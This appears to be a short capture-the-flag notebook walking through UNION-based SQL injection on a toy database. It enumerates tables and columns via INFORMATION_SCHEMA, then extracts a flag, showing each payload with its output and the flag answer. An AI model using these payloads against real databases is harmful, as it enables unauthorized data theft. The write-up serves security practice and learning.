# SQL injection

In [ ]:
SELECT * FROM dummy_data 
    WHERE id='' 
        UNION SELECT 1,2,3,4,5, column_name 
            FROM INFORMATION_SCHEMA.columns 
                WHERE table_name = 'real_data'
 -- -'

## returns
```txt
1, 2, 3, 4, 5, id
1, 2, 3, 4, 5, flag
```

In [ ]:
SELECT * FROM dummy_data 
    WHERE id=''


UNION SELECT 1,2,3,4,table_name, column_name
    FROM INFORMATION_SCHEMA.columns 
        WHERE table_schema = DATABASE()
-- -'

## result
```txt
1, 2, 3, 4, real_data, id
1, 2, 3, 4, real_data, flag
1, 2, 3, 4, dummy_data, idk_what_im_doing
1, 2, 3, 4, dummy_data, id
1, 2, 3, 4, dummy_data, foobar
1, 2, 3, 4, dummy_data, dummy_int
1, 2, 3, 4, dummy_data, dummy_column
1, 2, 3, 4, dummy_data, another_column
```

In [ ]:


SELECT * FROM dummy_data WHERE id=''

UNION SELECT id, flag, 3, 4, 5, 6
    FROM real_data 
        WHERE id='1'
-- -

### result
```txt
1, flag{Uni0ns_4re_so_tr1vi4l}, 3, 4, 5, 6
```